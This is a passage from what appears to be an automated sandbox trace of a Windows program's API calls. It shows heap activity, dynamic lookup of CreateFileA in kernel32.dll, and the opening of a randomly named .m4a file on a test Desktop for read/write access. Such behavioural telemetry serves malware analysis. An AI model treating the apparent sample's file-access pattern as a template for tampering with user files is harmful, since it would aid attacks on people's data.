Size=0x10) returned 0x889ad8 [0029.850] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0029.850] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0029.850] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0029.850] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0029.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0029.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0029.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0029.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0029.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0029.850] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0029.850] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0029.850] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0029.850] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0029.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0029.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0029.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0029.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0029.851] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0029.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0029.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0029.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0029.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0029.851] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0029.851] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0029.851] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0029.851] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0029.851] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0029.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0029.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0029.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0029.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.851] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0029.851] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0029.851] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0029.851] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0029.851] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0029.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0029.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0029.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0029.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0029.851] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.851] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0029.851] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0029.851] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0029.851] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88cbc8 [0029.851] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88cbc8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0029.852] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0029.852] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0029.852] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0029.852] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0029.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0029.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0029.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0029.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0029.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0029.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cbc8 [0029.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88cbc8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0029.852] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0029.852] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0029.852] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0029.852] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0029.852] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0029.852] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0029.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0029.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0029.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0029.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0029.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0029.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0029.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0029.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0029.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x88ffb0 [0029.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Bn6B0LdLyx0L0Guv_ Y.m4a", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0029.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3e) returned 0x7ab260 [0029.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Bn6B0LdLyx0L0Guv_ Y.m4a", cchWideChar=62, lpMultiByteStr=0x7ab260, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Bn6B0LdLyx0L0Guv_ Y.m4a", lpUsedDefaultChar=0x0) returned 62 [0029.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0029.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0029.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0029.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0029.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0029.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0029.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0029.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0029.853] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Bn6B0LdLyx0L0Guv_ Y.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bn6b0ldlyx0l0guv_ y.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0029.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0029.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0029.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0029.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0029.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0029.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0029.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0029.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0029.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0029.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0029.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0029.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0029.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0029.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0029.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x88ffb0, cbMultiByte=62, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0029.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x7c) returned 0x7d5b30 [0029.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x88ffb0, cbMultiByte=62, lpWideCharStr=0x7d5b30, cchWideChar=62 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Bn6B0LdLyx0L0Guv_ Y.m4a") returned 62 [0029.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0029.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0029.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0029.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0029.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0029.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0029.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0029.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0029.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0029.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0029.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0029.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0029.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0029.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0029.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0029.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0029.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0029.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0029.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0029.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0029.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0029.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0029.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0029.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0029.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0029.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0029.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0029.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0029.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0029.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0029.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0029.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0029.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0029.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0029.855] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0029.855] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0029.855] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0029.855] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0029.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0029.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0029.855] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0029.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0029.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0029.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0029.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0029.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0029.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0029.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0029.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0029.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0029.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0029.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0029.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0029.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0029.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0029.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0029.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0029.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0029.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0029.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0029.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0029.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0029.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0029.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0029.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0029.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0029.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0029.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0029.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0029.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0029.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0029.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0029.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0029.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0029.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0029.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0029.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0029.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0029.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0029.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0029.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0029.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0029.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0029.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0029.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0029.856] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0029.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0029.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0029.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0029.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0029.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0029.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0029.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0029.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0029.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0029.856] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0029.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0029.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0029.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0029.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0029.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0029.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0029.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0029.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0029.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0029.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0029.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0029.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0029.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0029.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0029.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0029.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0029.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0029.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0029.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0029.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0029.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0029.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0029.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0029.857] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0029.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 